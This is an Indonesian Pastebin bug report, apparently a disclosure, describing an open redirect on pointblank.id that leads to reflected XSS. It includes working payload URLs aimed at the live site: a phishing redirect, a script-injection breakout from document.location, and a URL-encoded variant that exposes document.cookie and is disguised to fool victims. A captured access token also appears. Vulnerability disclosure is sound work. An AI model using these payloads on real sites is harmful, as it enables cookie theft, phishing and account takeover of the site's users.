Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##########################################################################
- $ ~> TITLE : PENEMUAN BUG OPEN REDIRECT LEAD TO XSS $
- $ INJECTION AND CAN STEAL USER COOKIE .. $
- $ ~> DOMAIN : https://www.pointblank.id $
- $ ~> SEVERITY : MEDIUM-HIGH $
- $ ~> FOUNDER : Faundra $
- $ ~> CONTACT : robot.mikhro.fllupy@gmail.com $
- $ ~> DATE FOUND : Minggu, 07/04/2019 $
- ##########################################################################
- •Perkenalkan, nama saya Faundra ..
- •Saya adalah seorang Bug Hunter..
- Saya menemukan bug pada domain utama website Point Blank
- Zepetto Indonesia. Jenis bug ini tidak secara langsung menyerang
- sisi backend dari website. Namun jika dibiarkan tentu bug ini bisa
- merugikan user yang awam ketika ada orang yang tidak bertanggung
- jawab , menggunakan bug ini untuk mengambil alih akun user.
- Berikut langkah-langkah nya:
- #OPEN REDIRECT#
- 1. Pertama saya mengunjungi domain pointblank.id dengan tujuan
- untuk melihat event-event apa saja yang sedah berlangsung.
- 2. Setelah melihat-lihat sebentar , entah kenapa saya berpikir untuk
- melakukan penetration testing pada website ini.
- 3. Saya pun login , dan masuk kebagian dashboard/halaman info
- user untuk mengecek kemungkinan adanya bug.
- 4. Dan setelah saya melihat-lihat , perhatian saya tertuju pada
- bagian tombol/widget "PUSAT ISI ULANG PB"
- 5. Saya pun langsung mengklik tombol/widget tersebut dan saya
- langsung ter redirect ke halaman link
- https://topup.pointblank.id/Topup/Index
- 6. Saya pun kembali ke halaman/link sebelumnya
- dan langsung curiga serta mencari tahu.
- 7. Lalu saya menemukan hal yg unik yang membut saya
- penasaran untuk mengexplorenya lebih dalam .
- Ketika saya mengklik "PUSAT ISI ULANG PB" saya melihat
- parameter "?redirect_url=https://topup.pointblank.id" dimana
- jika digabung ke link domain menjadi seperti:
- | https://www.pointblank.id/topup/auth?redirect_url=https://topup.pointblank.id |
- 8. Saya pun langsung berpikiran bahwa parameter ini vuln akan
- bug "Open Redirect" .
- 9. Untuk melakukan pengecekan saya mencoba menggati url pada
- parameter tersebut menjadi https://www.google.com. Dan benar saja,
- saya langsung ter redirect ke halaman utama google.com tanpa
- ada "Alert/Peringatan akan meninggalkan Website" .
- 10. Disini saya langsung menyimpulkan bahwa parameter ini vuln
- akan bug yang bernama `Open Redirect ` .
- *IMPACT :
- Untuk Bug Open Redirect Attacker bisa saja menyisipkan "URL Web Phising"
- yang sudah di
- shortener dengan bit.ly lalu mengirimkan ke victim/korban melalui
- email/ media sosial lainnya dengan iming-iming akan mendapat
- hadiah. User/victim/korban yang awam mungkin akan langsung percaya
- dan mengklik link yg dikirimkan oleh attacker tersebut karena melihat
- ada domain resmi dr pbnya . Contoh:
- | https://www.pointblank.id/topup/auth?redirect_url=https://bit.ly/2uX4ygk |
- ==============================================================================
- #LEAD TO XSS INJECTION
- •Setelah menemukan bug open redirect , saya berpikiran apakah bug ini
- bisa menjadi bug XSS Injection juga. Lantas saya mencoba melakukan
- sniff pada lalu lintas data dengan SSL Packet Capture.
- •Saya kembali mengakses url tersebut & menyalakan SSL Packet Capture.
- 1. Ketika saya melihat hasil sniff , saya menemukan bahwa url pada parameter
- "?redirect_url=" ter-refleksi kedalam kode javascript .
- ------------------------------
- Berikut kodenya: |
- ======================================================================
- <script type="text/javascript">
- $(window).on("load",
- function() {
- document.location='https://www.google.com?access_token=8yBkBhDOZOgz1cumNxfU5LOSFnjD0b987fBeSkohI8sFZkSFgCK7srgi0qcQIe5Tc3G6nB4PNyzTOMTbag%2FEL1hsoil4ylm512bHE74iuE4%3D';
- });
- </script>
- ======================================================================
- 2. Kode inilah yang membuat user dapat ter-redirect ke link yang ada pada parameter.
- 3. Saya dgn dibantu oleh rekan saya, mencoba memahami alur & konsep dari kode ini , lalu saya
- menemukan cara agar dapat
- membypass properti/string "document.location" .
- Saya menggunakan :
- '.substr(0,0).concat(document.location);document.write('abcd');//
- •Menjadi seperti ini :
- | https://www.pointblank.id/topup/auth?redirect_url=https://www.google.com%27.substr(0,0).concat(document.location);document.write(%27abcd%27);javascript:prompt("xss3d%20by%20mikhro",document.domain);// |
- Dan ketika diakses saya berhasil mem-bypass "document.location" yg menuju google.com dan saya ter-redirect ke halaman blank
- yang bertuliskan "abcd", untuk memunculkan popup saya tinggal menambahkan ";javascript:alert(2);//" .Menjadi Seperti ini :
- | https://www.pointblank.id/topup/auth?redirect_url=https://www.google.com%27.substr(0,0).concat(document.location);document.write(%27abcd%27);javascript:prompt("xss3d%20by%20mikhro",document.domain);// |
- Penjelasan kode :
- ~ document.location = '......'; <= Kan udah ada isinya yaitu google.com kita bersihin dulu pake substr.
- atau bisa dikatakan bahwa substr itu buat ngambil slice dari string nya .
- ~ Disitu 0,0 artinya ambil dari index 0 sampe 0, sedangkan ini kan berarti string kosong.
- ~ Trs .concat buat gabungin string sama string. Karena sebelumya disitu udh ada , kita buat jadi string kosong.
- Nah biar gak ke redirect diisi pake value yang sama.
- ~ Kenapa mesti "document.location" ? Soalnya itu ngereplace document.location
- sama string yg baru, kalau di replace sama dirinya sendiri kan berarti
- engggak ada yg berubah. Umpamanya nya jadi kayak gini document.location = document.location.
- ~ Langsungyoba deh exec js nya sama knp ada // soalnya disitu ada query google jd ngga mau keganggu itu jdnya tinggal di kasi // (comment).
- *IMPACT :
- Untuk Bug XSS Injection , dapat mencuri cookie dengan method cookie stealer dan sedikit social engineering dengan mengirimkan
- url yang sudah dimodifikasi seperti ini:
- | https://www.pointblank.id/topup/auth?redirect_url=//www.google.com/2uX4ygk'.substr(0,0).concat(document.location);document.write('<center><h1><b>THANK YOU FOR YOUR ATTENTION ! :D</b></center></h1>');javascript:prompt("Dibagian ini user cookie user bisa dicuri oleh sang Attacker/Hacker ! Ini dia cookienya :",document.cookie);// |
- •Dan untuk mengurangi perasaan curige dari victim , maka sang attacker
- melakukan encode pada url tersebut menjadi seperti ini :
- | https://www.pointblank.id/topup/auth?redirect_url=%2f%2fwww.google.com%2f2uX4ygk%27%2e%73%75%62%73%74%72%280%2c0%29%2e%63%6f%6e%63%61%74%28%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%63%65%6e%74%65%72%3e%3c%68%31%3e%3c%62%3e%54%48%41%4e%4b%20%59%4f%55%20%46%4f%52%20%59%4f%55%52%20%41%54%54%45%4e%54%49%4f%4e%20%21%20%3a%44%3c%2f%62%3e%3c%2f%63%65%6e%74%65%72%3e%3c%2f%68%31%3e%27%29%3b%6a%61%76%61%73%63%72%69%70%74%3a%70%72%6f%6d%70%74%28%22%44%69%62%61%67%69%61%6e%20%69%6e%69%20%75%73%65%72%20%63%6f%6f%6b%69%65%20%75%73%65%72%20%62%69%73%61%20%64%69%63%75%72%69%20%6f%6c%65%68%20%73%61%6e%67%20%41%74%74%61%63%6b%65%72%2f%48%61%63%6b%65%72%20%21%20%49%6e%69%20%64%69%61%20%63%6f%6f%6b%69%65%6e%79%61%20%3a%22%2c%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%2f%2f |
- •Besar harapan saya agar pihak Admin dari Web Point Blank Zepetto Indonesia
- dapat segera tanggap dan memperbaikinya sebelum ada orang yang tidak
- bertanggung jawab dengan memanfaatkan bug tersebut demi kepentingan
- sendiri yang dapat merugikan user/player tertentu.
- •Sekian Laporan bug dari saya . Kurang lebihnya mohon maaf , terima kasih !
Add Comment
Please, Sign In to add comment